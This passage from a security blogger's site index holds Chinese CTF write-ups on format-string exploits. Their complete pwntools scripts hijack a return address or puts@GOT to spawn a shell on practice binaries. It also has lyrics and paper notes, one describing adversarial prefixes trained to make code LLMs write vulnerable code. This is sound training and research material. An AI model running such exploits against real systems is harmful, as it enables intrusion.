href="https://blog.csdn.net/qq_43390703/article/details/121366718">堆基础-glibc_malloc_bin</a></li><li><a href="https://blog.csdn.net/qq_43390703/article/details/121366777">堆基础-glibc_malloc_chunk</a></li></ul></li></ul>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> Heap </tag>
<tag> 堆 </tag>
</tags>
</entry>
<entry>
<title>恋音と雨空</title>
<link href="/2026/01/30/rain/"/>
<url>/2026/01/30/rain/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><p>「好きだよ」と伝えればいいのに<br>願う先、怖くていえず<br>「好きだよ」と「好きだよ」が<br>募っては溶けてく<br>君との時間が一秒でも長くなるなら<br>ずっとじゃなくていい<br>願いかける 恋音と雨空<br>君と離れてから数日目の土砂降りの雨の中<br>こんな日は必ず傘を届けにいった<br>いつもの待ち合わせの場所いるはずのない面影待つ<br>傘もささず、ずぶ濡れな君はそこにいた<br>悴んだ手を温めることがもう一度できるなら<br>始まりの時まで戻りたい<br>「好きだよ」と伝えればいいのに<br>願う先、怖くていえず<br>「好きじゃない?」「好きだよ?」が<br>揺れる恋と雨空<br>君との時間が一秒でも長くなるなら<br>ずっとじゃなくていい<br>雨が止むまでこのままいさせて。。。<br>信じた明日も<br>君は過去と笑うの?<br>流し去る力も無く<br>あの日のままで時間が止まる<br>雫が二つ<br>君の頬を伝う<br>絶えず止まぬ雨のせいと恋音は詠う<br>町行く恋人が羨ましく思うことが増えた<br>いつから一人が怖くなったんだろう<br>でも今は束の間の幸せ<br>できることならこのまま<br>ありふれた恋人達になりたい<br>君がここで望んでいること<br>僕がここでいいたいこと<br>今なら想いも重なるかな?<br>「好きだよ」と伝えればいいのに<br>願う先、怖くていえず<br>横顔を見つめてる<br>それだけでも もういい!<br>だけど一握りの幸せも<br>君がくれたものだから<br>本当はずっと抱きしめていたい<br>「すれ違いも、二人もう一度やり直すための試練」だって<br>すぐに言えるのなら どんなにいいだろうか<br>好きという事実通りすぎて<br>今ではもう愛している<br>失った数日間でやっと知った<br>本当はこのまま気持ち確かめたくて、、、<br>「好きだよ」と伝えればいいのに<br>願う先、怖くていえず<br>「好きだよ」と「好きだよ」が<br>募っては溶けてく<br>君との時間が一秒でも長くなるなら<br>ずっとじゃなくていい<br>願いかける 恋音と雨空</p>]]></content>
<categories>
<category> 杂言碎语 </category>
</categories>
<tags>
<tag> 雨天 </tag>
</tags>
</entry>
<entry>
<title>【论文笔记】RefleXGen:The unexamined code is not worth using</title>
<link href="/2026/01/24/RefleXGenThe_unexamined_code_is_not_worth_using/"/>
<url>/2026/01/24/RefleXGenThe_unexamined_code_is_not_worth_using/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="基本信息">基本信息</h2><blockquote><p><strong>Title:</strong> RefleXGen: The unexamined code is not worth using<br><strong>Authors:</strong> Bin Wang, Hui Li*, AoFan Liu, et al.<br><strong>Affiliations:</strong> School of Electronic and Computer Engineering, Peking University (Shenzhen); China Mobile; China Telecom.<br><strong>Conference:</strong> <em>2025 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)</em><br><strong>DOI:</strong> 10.1109/ICASSP49660.2025.1089082<br><strong>PDF:</strong> <a href="https://arxiv.org/html/2510.23674v1">arXiv:2510.23674</a></p></blockquote><script src="https://giscus.app/client.js" data-repo="zer0ptr/zer0ptr.github.io" data-repo-id="R_kgDOQ7_WQA" data-category="General" data-category-id="DIC_kwDOQ7_WQM4C1Wz2" data-mapping="pathname" data-strict="0" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="bottom" data-theme="dark_protanopia" data-lang="en" crossorigin="anonymous" async></script>]]></content>
<categories>
<category> LLM </category>
</categories>
<tags>
<tag> LLM </tag>
<tag> Code Generation </tag>
<tag> LLM安全 </tag>
<tag> RAG </tag>
</tags>
</entry>
<entry>
<title>Hijack retaddr</title>
<link href="/2026/01/24/fmtstr-exploit-hijack-retaddr/"/>
<url>/2026/01/24/fmtstr-exploit-hijack-retaddr/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="原理">原理</h2><blockquote><p>利用格式化字符串漏洞来劫持程序的返回地址到我们想要执行的地址。</p></blockquote><h2 id="例子-三个白帽-pwnme-k0">例子 - 三个白帽 - pwnme_k0</h2><h3 id="checksec">Checksec</h3><div class="code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Training/Pwn/fmtstr/hijack_retaddr on git:master x [12:45:55] </span>$ checksec pwnme_k0[*] <span class="hljs-string">'/home/zer0ptr/CTF-Training/Pwn/fmtstr/hijack_retaddr/pwnme_k0'</span> Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)</code></pre></div><p>可以看出程序主要开启了 NX 保护以及 Full RELRO 保护。这我们就没有办法修改程序的 got 表了。</p><h3 id="分析程序">分析程序</h3><p>func sub_400B07处:查看功能中发现了格式化字符串漏洞</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> __fastcall <span class="hljs-title function_">sub_400B07</span><span class="hljs-params">(<span class="hljs-type">int</span> a1, <span class="hljs-type">int</span> a2, <span class="hljs-type">int</span> a3, <span class="hljs-type">int</span> a4, <span class="hljs-type">int</span> a5, <span class="hljs-type">int</span> a6, <span class="hljs-type">char</span> format, <span class="hljs-type">int</span> a8, __int64 a9)</span>{ write(<span class="hljs-number">0</span>, <span class="hljs-string">"Welc0me to sangebaimao!\n"</span>, <span class="hljs-number">0x1Au</span>); <span class="hljs-built_in">printf</span>(&format); <span class="hljs-keyword">return</span> <span class="hljs-built_in">printf</span>((<span class="hljs-type">const</span> <span class="hljs-type">char</span> *)&a9 + <span class="hljs-number">4</span>);}</code></pre></div><p>其输出的内容为 &a4 + 4。我们回溯一下,发现我们读入的 password 内容也是</p><div class="code-wrapper"><pre><code class="hljs c">v6 = read(<span class="hljs-number">0</span>, (<span class="hljs-type">char</span> *)&a4 + <span class="hljs-number">4</span>, <span class="hljs-number">0x14u</span>LL);</code></pre></div><p>当然我们还可以发现 username 和 password 之间的距离为 20 个字节。</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-built_in">puts</span>(<span class="hljs-string">"Input your username(max lenth:20): "</span>);fflush(<span class="hljs-built_in">stdout</span>);v8 = read(<span class="hljs-number">0</span>, &bufa, <span class="hljs-number">0x14u</span>LL);<span class="hljs-keyword">if</span> ( v8 && v8 <= <span class="hljs-number">0x14u</span> ){ <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Input your password(max lenth:20): "</span>); fflush(<span class="hljs-built_in">stdout</span>); v6 = read(<span class="hljs-number">0</span>, (<span class="hljs-type">char</span> *)&a4 + <span class="hljs-number">4</span>, <span class="hljs-number">0x14u</span>LL); fflush(<span class="hljs-built_in">stdout</span>); *(_QWORD *)buf = bufa; *(_QWORD *)(buf + <span class="hljs-number">8</span>) = a3; *(_QWORD *)(buf + <span class="hljs-number">16</span>) = a4;</code></pre></div><h3 id="利用思路">利用思路</h3><p>我们最终的目的是希望可以获得系统的 shell,可以发现在给定的文件中,在<code>0x00000000004008AA</code>地址处有一个直接调用 system(‘bin/sh’) 的函数,那如果我们修改某个函数的返回地址为这个地址,那就相当于获得了 shell。</p><p>虽然存储返回地址的内存本身是动态变化的,但是其相对于 rbp 的地址并不会改变,所以我们可以使用相对地址来计算。利用思路如下:</p><ul><li>确定偏移</li><li>获取函数的 rbp 与返回地址</li><li>根据相对偏移获取存储返回地址的地址</li><li>将执行 system 函数调用的地址写入到存储返回地址的地址。</li></ul><h3 id="确定偏移">确定偏移</h3><p>首先,我们先来确定一下偏移。输入用户名 aaaaaaaa,密码随便输入,断点下在输出密码的那个 printf(&a4 + 4) 函数处:</p><div class="code-wrapper"><pre><code class="hljs bash">────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7fffffffdc48 —▸ 0x400b2d ◂— lea rax, [rbp + 0x24]01:0008│ rbp 0x7fffffffdc50 —▸ 0x7fffffffdc90 —▸ 0x7fffffffdd40 ◂— 102:0010│+008 0x7fffffffdc58 —▸ 0x400d74 ◂— add rsp, 0x3003:0018│ rdi 0x7fffffffdc60 ◂— <span class="hljs-string">'aaaaaaaa\n'</span>04:0020│+018 0x7fffffffdc68 ◂— 0xa /* <span class="hljs-string">'\n'</span> */05:0028│+020 0x7fffffffdc70 ◂— 0x702570250000000006:0030│+028 0x7fffffffdc78 ◂— <span class="hljs-string">'%p%p%p%p%p%p%p%oM\r@'</span>07:0038│+030 0x7fffffffdc80 ◂— <span class="hljs-string">'%p%p%p%oM\r@'</span>──────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────────────── ► 0 0x7ffff7c606f0 <span class="hljs-built_in">printf</span> 1 0x400b2d None 2 0x400d74 None 3 0x400e98 None 4 0x7ffff7c29d90 __libc_start_call_main+128 5 0x7ffff7c29e40 __libc_start_main+128 6 0x4007d9 None─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> fmtarg 0x7fffffffdc60The index of format argument : 9 (\"\%8<span class="hljs-variable">$p</span>\")</code></pre></div><p>偏移为9 - 1 = 8。</p><h3 id="修改地址">修改地址</h3><p>我们再仔细观察下断点处栈的信息:<br>可以看到栈上第二个位置存储的就是该函数的返回地址 (其实也就是调用 show account 函数时执行 push rip 所存储的值),在格式化字符串中的偏移为 7。</p><p>与此同时栈上,第一个元素存储的也就是上一个函数的 rbp。所以我们可以得到偏移 0x00007fffffffdb80 - 0x00007fffffffdb48 = 0x38。继而如果我们知道了 rbp 的数值,就知道了函数返回地址的地址。</p><p>0x0000000000400d74 与 0x00000000004008AA 只有低 2 字节不同,所以我们可以只修改 0x00007fffffffdb48 开始的 2 个字节。</p><div class="code-wrapper"><pre><code class="hljs asm">.text:00000000004008A6 sub_4008A6 proc near.text:00000000004008A6 ; __unwind {.text:00000000004008A6 push rbp.text:00000000004008A7 mov rbp, rsp.text:00000000004008AA <- here mov edi, offset command ; "/bin/sh".text:00000000004008AF call system.text:00000000004008B4 pop rdi.text:00000000004008B5 pop rsi.text:00000000004008B6 pop rdx.text:00000000004008B7 retn</code></pre></div><h3 id="exploit">Exploit</h3><div class="code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *context.log_level=<span class="hljs-string">"debug"</span>context.arch=<span class="hljs-string">"amd64"</span>sh=process(<span class="hljs-string">"./pwnme_k0"</span>)binary=ELF(<span class="hljs-string">"pwnme_k0"</span>)<span class="hljs-comment">#gdb.attach(sh)</span>sh.recv()sh.writeline(<span class="hljs-string">b"1"</span>*<span class="hljs-number">8</span>)sh.recv()sh.writeline(<span class="hljs-string">b"%6$p"</span>)sh.recv()sh.writeline(<span class="hljs-string">b"1"</span>)sh.recvuntil(<span class="hljs-string">b"0x"</span>)ret_addr = <span class="hljs-built_in">int</span>(sh.recvline().strip(),<span class="hljs-number">16</span>) - <span class="hljs-number">0x38</span>success(<span class="hljs-string">"ret_addr:"</span>+<span class="hljs-built_in">hex</span>(ret_addr))sh.recv()sh.writeline(<span class="hljs-string">b"2"</span>)sh.recv()sh.sendline(p64(ret_addr))sh.recv()<span class="hljs-comment">#sh.writeline("%2214d%8$hn")</span><span class="hljs-comment">#0x4008aa-0x4008a6</span>sh.writeline(<span class="hljs-string">b"%2218d%8$hn"</span>)sh.recv()sh.writeline(<span class="hljs-string">b"1"</span>)sh.recv()sh.interactive()</code></pre></div><p><img src="/images/hijack-retaddr/1.png" alt="images"></p><script src="https://giscus.app/client.js" data-repo="zer0ptr/zer0ptr.github.io" data-repo-id="R_kgDOQ7_WQA" data-category="General" data-category-id="DIC_kwDOQ7_WQM4C1Wz2" data-mapping="pathname" data-strict="0" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="bottom" data-theme="dark_protanopia" data-lang="en" crossorigin="anonymous" async></script>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> 格式化字符串漏洞 </tag>
<tag> Pwn </tag>
</tags>
</entry>
<entry>
<title>Hijack Got</title>
<link href="/2026/01/24/fmtstr-exploit-hijackgot/"/>
<url>/2026/01/24/fmtstr-exploit-hijackgot/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="原理">原理</h2><p>在目前的 C 程序中,libc 中的函数都是通过 GOT 表来跳转的。此外,在没有开启 RELRO 保护的前提下,<strong>每个 libc 的函数对应的 GOT 表项是可以被修改的</strong>。因此,我们可以修改某个 libc 函数的 GOT 表内容为另一个 libc 函数的地址来实现对程序的控制。比如说我们可以修改 printf 的 got 表项内容为 system 函数的地址。从而,程序在执行 printf 的时候实际执行的是 system 函数。</p><p>假设我们将函数 A 的地址覆盖为函数 B 的地址,那么这一攻击技巧可以分为以下步骤:</p><ul><li>确定函数 A 的 GOT 表地址。<ul><li>这一步我们利用的函数 A 一般在程序中已有,所以可以采用简单的寻找地址的方法来找。</li></ul></li><li>确定函数 B 的内存地址<ul><li>这一步通常来说,需要我们自己想办法来泄露对应函数 B 的地址。</li></ul></li><li>将函数 B 的内存地址写入到函数 A 的 GOT 表地址处。<ul><li>这一步一般来说需要我们利用函数的漏洞来进行触发。一般利用方法有如下两种<ul><li>写入函数:write 函数。</li><li>ROP</li></ul> <div class="code-wrapper"><pre><code class="hljs asm">pop eax; ret; # printf@got -> eaxpop ebx; ret; # (addr_offset = system_addr - printf_addr) -> ebxadd [eax] ebx; ret; # [printf@got] = [printf@got] + addr_offset</code></pre></div><ul><li>格式化字符串任意地址写</li></ul></li></ul></li></ul><h2 id="例子-2016-cctf-pwn3">例子 - 2016 CCTF Pwn3</h2><h3 id="checksec">Checksec</h3><div class="code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Training/Pwn/fmtstr/hijack-GOT/2016-CCTF-pwn3 on git:master x [12:18:24]</span>$ checksec pwn3[*] <span class="hljs-string">'/home/zer0ptr/CTF-Training/Pwn/fmtstr/hijack-GOT/2016-CCTF-pwn3/pwn3'</span> Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) Stripped: No</code></pre></div><p>可以看出程序主要开启了 NX 保护。我们一般默认远程都是开启 ASLR 保护的。</p><h3 id="分析程序">分析程序</h3><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> __cdecl __noreturn <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span>{ <span class="hljs-type">int</span> command; <span class="hljs-comment">// eax</span> <span class="hljs-type">char</span> s1[<span class="hljs-number">40</span>]; <span class="hljs-comment">// [esp+14h] [ebp-2Ch] BYREF</span> <span class="hljs-type">int</span> v5; <span class="hljs-comment">// [esp+3Ch] [ebp-4h]</span> setbuf(<span class="hljs-built_in">stdout</span>, <span class="hljs-number">0</span>); ask_username(s1); ask_password(s1); <span class="hljs-keyword">while</span> ( <span class="hljs-number">1</span> ) { <span class="hljs-keyword">while</span> ( <span class="hljs-number">1</span> ) { print_prompt(); command = get_command(); v5 = command; <span class="hljs-keyword">if</span> ( command != <span class="hljs-number">2</span> ) <span class="hljs-keyword">break</span>; put_file(); } <span class="hljs-keyword">if</span> ( command == <span class="hljs-number">3</span> ) { show_dir(); } <span class="hljs-keyword">else</span> { <span class="hljs-keyword">if</span> ( command != <span class="hljs-number">1</span> ) <span class="hljs-built_in">exit</span>(<span class="hljs-number">1</span>); get_file(); } }}</code></pre></div><p>get_file func</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> <span class="hljs-title function_">get_file</span><span class="hljs-params">()</span>{ <span class="hljs-type">char</span> dest[<span class="hljs-number">200</span>]; <span class="hljs-comment">// [esp+1Ch] [ebp-FCh] BYREF</span> <span class="hljs-type">char</span> s1[<span class="hljs-number">40</span>]; <span class="hljs-comment">// [esp+E4h] [ebp-34h] BYREF</span> <span class="hljs-type">char</span> *i; <span class="hljs-comment">// [esp+10Ch] [ebp-Ch]</span> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"enter the file name you want to get:"</span>); __isoc99_scanf(<span class="hljs-string">"%40s"</span>, s1); <span class="hljs-keyword">if</span> ( !<span class="hljs-built_in">strncmp</span>(s1, <span class="hljs-string">"flag"</span>, <span class="hljs-number">4u</span>) ) <span class="hljs-built_in">puts</span>(<span class="hljs-string">"too young, too simple"</span>); <span class="hljs-keyword">for</span> ( i = (<span class="hljs-type">char</span> *)file_head; i; i = (<span class="hljs-type">char</span> *)*((_DWORD *)i + <span class="hljs-number">60</span>) ) { <span class="hljs-keyword">if</span> ( !<span class="hljs-built_in">strcmp</span>(i, s1) ) { <span class="hljs-built_in">strcpy</span>(dest, i + <span class="hljs-number">40</span>); <span class="hljs-keyword">return</span> <span class="hljs-built_in">printf</span>(dest); } } <span class="hljs-keyword">return</span> <span class="hljs-built_in">printf</span>(dest);}</code></pre></div><p>首先分析程序,可以发现程序似乎主要实现了一个需密码登录的 ftp,具有 get,put,dir 三个基本功能。大概浏览一下每个功能的代码,发现在 get 功能中存在格式化字符串漏洞。</p><h3 id="漏洞利用思路">漏洞利用思路</h3><p>既然有了格式化字符串漏洞,那么我们可以确定如下的利用思路:</p><ul><li>绕过密码</li><li>确定格式化字符串参数偏移</li><li>利用 put@got 获取 put 函数地址,进而获取对应的 <a href="http://libc.so">libc.so</a> 的版本,进而获取对应 system 函数地址</li><li>修改 puts@got 的内容为 system 的地址</li><li>当程序再次执行 puts 函数的时候,其实执行的是 system 函数</li></ul><h3 id="exploit">Exploit</h3><div class="code-wrapper"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/env python3</span><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *pwn3 = ELF(<span class="hljs-string">'./pwn3'</span>)libc = ELF(<span class="hljs-string">'./libc.so'</span>)<span class="hljs-comment"># sh = process('./pwn3')</span>sh = remote(<span class="hljs-string">'127.0.0.1'</span>, <span class="hljs-number">12345</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">get</span>(<span class="hljs-params">name</span>): sh.sendline(<span class="hljs-string">b'get'</span>) sh.recvuntil(<span class="hljs-string">b'enter the file name you want to get:'</span>) sh.sendline(name) data = sh.recv() <span class="hljs-keyword">return</span> data<span class="hljs-keyword">def</span> <span class="hljs-title function_">put</span>(<span class="hljs-params">name, content</span>): sh.sendline(<span class="hljs-string">b'put'</span>) sh.recvuntil(<span class="hljs-string">b'please enter the name of the file you want to upload:'</span>) sh.sendline(name) sh.recvuntil(<span class="hljs-string">b'then, enter the content:'</span>) sh.sendline(content)<span class="hljs-keyword">def</span> <span class="hljs-title function_">show_dir</span>(): sh.sendline(<span class="hljs-string">b'dir'</span>)tmp = <span class="hljs-string">'sysbdmin'</span>name = <span class="hljs-string">""</span><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> tmp: name += <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">ord</span>(i) - <span class="hljs-number">1</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">password</span>(): sh.recvuntil(<span class="hljs-string">b'Name (ftp.hacker.server:Rainism):'</span>) sh.sendline(name.encode()) password()puts_got = pwn3.got[<span class="hljs-string">'puts'</span>]log.success(<span class="hljs-string">'puts got : '</span> + <span class="hljs-built_in">hex</span>(puts_got))put(<span class="hljs-string">b'1111'</span>, <span class="hljs-string">b'%8$s'</span> + p32(puts_got))puts_addr = u32(get(<span class="hljs-string">b'1111'</span>)[:<span class="hljs-number">4</span>])log.success(<span class="hljs-string">'puts addr : '</span> + <span class="hljs-built_in">hex</span>(puts_addr))libc_base = puts_addr - libc.sym[<span class="hljs-string">'puts'</span>]system_addr = libc_base + libc.sym[<span class="hljs-string">'system'</span>]log.success(<span class="hljs-string">'libc base : '</span> + <span class="hljs-built_in">hex</span>(libc_base))log.success(<span class="hljs-string">'system addr : '</span> + <span class="hljs-built_in">hex</span>(system_addr))log.info(<span class="hljs-string">'puts offset in libc: '</span> + <span class="hljs-built_in">hex</span>(libc.sym[<span class="hljs-string">'puts'</span>]))log.info(<span class="hljs-string">'system offset in libc: '</span> + <span class="hljs-built_in">hex</span>(libc.sym[<span class="hljs-string">'system'</span>]))payload = fmtstr_payload(<span class="hljs-number">7</span>, {puts_got: system_addr}, write_size=<span class="hljs-string">'byte'</span>)put(<span class="hljs-string">b'/bin/sh;'</span>, payload)sh.recvuntil(<span class="hljs-string">b'ftp>'</span>)sh.sendline(<span class="hljs-string">b'get'</span>)sh.recvuntil(<span class="hljs-string">b'enter the file name you want to get:'</span>)sh.sendline(<span class="hljs-string">b'/bin/sh;'</span>)show_dir()sh.interactive()</code></pre></div><h3 id="补充">补充</h3><blockquote><ul><li>我在获取 puts 函数地址时使用的偏移是 8,这是因为我希望我输出的前 4 个字节就是 puts 函数的地址。其实格式化字符串的首地址的偏移是 7。</li><li>这里我利用了 pwntools 中的 fmtstr_payload 函数,比较方便获取我们希望得到的结果,有兴趣的可以查看官方文档尝试。比如这里 fmtstr_payload(7, {puts_got: system_addr}) 的意思就是,我的格式化字符串的偏移是 7,我希望在 puts_got 地址处写入 system_addr 地址。默认情况下是按照字节来写的。</li></ul></blockquote><script src="https://giscus.app/client.js" data-repo="zer0ptr/zer0ptr.github.io" data-repo-id="R_kgDOQ7_WQA" data-category="General" data-category-id="DIC_kwDOQ7_WQM4C1Wz2" data-mapping="pathname" data-strict="0" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="bottom" data-theme="dark_protanopia" data-lang="en" crossorigin="anonymous" async></script>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> 格式化字符串漏洞 </tag>
<tag> Pwn </tag>
</tags>
</entry>
<entry>
<title>64 位程序格式化字符串漏洞</title>
<link href="/2026/01/23/fmtstr-exploit-x64/"/>
<url>/2026/01/23/fmtstr-exploit-x64/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="原理">原理</h2><blockquote><p>其实 64 位的偏移计算和 32 位类似,都是算对应的参数。只不过 64 位函数的前 6 个参数是存储在相应的寄存器中的。但是在利用格式化字符串时,虽然我们并没有向相应寄存器中放入数据,但是程序依旧会按照格式化字符串的相应格式对其进行解析。</p></blockquote><h2 id="例子">例子</h2><h3 id="2017-uiuctf-pwn200-goodluck">2017 UIUCTF pwn200 Goodluck</h3><h4 id="checksec">Checksec:</h4><div class="code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck on git:master x [12:06:12]</span>$ checksec goodluck[*] Checking <span class="hljs-keyword">for</span> new versions of pwntools To <span class="hljs-built_in">disable</span> this functionality, <span class="hljs-built_in">set</span> the contents of /home/zer0ptr/.cache/.pwntools-cache-3.10/update to <span class="hljs-string">'never'</span> (old way). Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide): [update] interval=never[*] You have the latest version of Pwntools (4.15.0)[*] <span class="hljs-string">'/home/zer0ptr/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck/goodluck'</span> Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) Stripped: No</code></pre></div><p>可以看出程序开启了 NX 保护以及部分 RELRO 保护。</p><h4 id="分析程序">分析程序</h4><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-keyword">for</span> ( j = <span class="hljs-number">0</span>; j <= <span class="hljs-number">21</span>; ++j ){ v5 = format[j]; <span class="hljs-keyword">if</span> ( !v5 || v11[j] != v5 ) { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"You answered:"</span>); <span class="hljs-built_in">printf</span>(format); <span class="hljs-built_in">puts</span>(<span class="hljs-string">"\nBut that was totally wrong lol get rekt"</span>); fflush(_bss_start); result = <span class="hljs-number">0</span>; <span class="hljs-keyword">goto</span> LABEL_11; }}</code></pre></div><h4 id="确定偏移">确定偏移</h4><div class="code-wrapper"><pre><code class="hljs bash">──────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────00:0000│ rsp 0x7fffffffdcd8 —▸ 0x400890 (main+234) ◂— mov edi, 0x4009b801:0008│-040 0x7fffffffdce0 ◂— 0x3100000002:0010│-038 0x7fffffffdce8 —▸ 0x602ca0 ◂— 0x363534333231 /* <span class="hljs-string">'123456'</span> */03:0018│-030 0x7fffffffdcf0 —▸ 0x6022a0 ◂— 0x60204:0020│-028 0x7fffffffdcf8 —▸ 0x7fffffffdd00 ◂— 0x616c667b67616c66 (<span class="hljs-string">'flag{fla'</span>)──────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> fmtarg 0x7fffffffdcf8The index of format argument : 10 (\"\%9<span class="hljs-variable">$p</span>\")</code></pre></div><h4 id="exploit">Exploit</h4><div class="code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)goodluck = ELF(<span class="hljs-string">'./goodluck'</span>)sh = process(<span class="hljs-string">'./goodluck'</span>)payload = <span class="hljs-string">b"%9$s"</span><span class="hljs-built_in">print</span>(payload)<span class="hljs-comment"># gdb.attach(sh)</span>sh.sendline(payload)<span class="hljs-built_in">print</span>(sh.recv())sh.interactive()</code></pre></div><div class="code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck on git:master x [12:12:00] C:130</span>$ python3 exp.py[*] <span class="hljs-string">'/home/zer0ptr/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck/goodluck'</span> Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) Stripped: No[+] Starting <span class="hljs-built_in">local</span> process <span class="hljs-string">'./goodluck'</span>: pid 7481[*] Process <span class="hljs-string">'./goodluck'</span> stopped with <span class="hljs-built_in">exit</span> code 0 (pid 7481)b<span class="hljs-string">"what's the flag\nYou answered:\nflag{flag}\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\nBut that was totally wrong lol get rekt\n"</span>[*] Switching to interactive mode[*] Got EOF <span class="hljs-keyword">while</span> reading <span class="hljs-keyword">in</span> interactive$</code></pre></div><script src="https://giscus.app/client.js" data-repo="zer0ptr/zer0ptr.github.io" data-repo-id="R_kgDOQ7_WQA" data-category="General" data-category-id="DIC_kwDOQ7_WQM4C1Wz2" data-mapping="pathname" data-strict="0" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="bottom" data-theme="dark_protanopia" data-lang="en" crossorigin="anonymous" async></script>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> 格式化字符串漏洞 </tag>
<tag> Pwn </tag>
</tags>
</entry>
<entry>
<title>【论文笔记】Large Language Models for Code:Security Hardening and Adversarial Testing</title>
<link href="/2026/01/23/Large_Language_Models_for_Code_Security_Hardening_and_Adversarial_Testing/"/>
<url>/2026/01/23/Large_Language_Models_for_Code_Security_Hardening_and_Adversarial_Testing/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="基本信息">基本信息</h2><blockquote><p>Title: Large Language Models for Code:Security Hardening and Adversarial Testing<br>Author: Jingxuan He, Martin Vechev (ETH Zurich)<br>Conference: ACM CCS 2023<br>PDF: <a href="https://arxiv.org/pdf/2302.05319">https://arxiv.org/pdf/2302.05319</a></p></blockquote><p>该文章提出了一种用于代码生成大模型的安全硬化与评估的创新框架,其核心是通过静态的<strong>安全前缀引导</strong>为模型注入安全知识,并首创性地通过<strong>对抗性前缀</strong>生成来评估该防护的鲁棒性。其创新点在于敏锐地洞察到,传统的、基于规则的安全提示在面对自适应攻击时可能存在盲区,因此设计了一个“攻防一体”的闭环评估系统:一方面,利用漏洞扫描结果从知识库中匹配修复<strong>指令作为安全前缀</strong>,对模型进行安全加固;另一方面,训练一个攻击者模型,利用强化学习自动生成能诱导模型写出漏洞代码的<strong>对抗性前缀</strong>,以此对防御效果进行对抗性测试。这套方法将模型安全性的讨论,从“安全加固”是否有效提升到了在“何种攻击下会失效”,为构建可信的代码助手提供了自动化的评估范式和可量化的基准。</p><h2 id="引言">引言</h2><p>大型语言模型(Large Language Models, 